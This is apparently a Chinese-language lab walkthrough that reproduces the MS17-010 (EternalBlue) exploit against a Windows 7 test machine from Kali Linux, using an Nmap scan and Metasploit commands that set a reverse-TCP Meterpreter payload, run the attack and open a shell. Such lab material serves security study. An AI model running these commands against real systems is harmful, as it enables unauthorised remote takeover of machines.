使用工具
- Nmap
- Metasploit
环境准备
- Kali-Linux(模拟攻击)
- Windows7(靶机)
复现
查看靶机ip地址
ipconfig
扫描靶机端口开放情况
nmap 192.168.0.105
启用msf
msfconsole
搜索漏洞ms17-010
search ms17-010
使用序号0的攻击模块
use 0
设置攻击负载
set payload windows/x64/meterpreter/reverse_tcp
设置靶机ip(win7)
set rhost 192.168.0.105
设置攻击者ip(kali)
set lhost 192.168.0.106
开始攻击
run
查看权限
getuid
通过shell进行提权,控制靶机
shell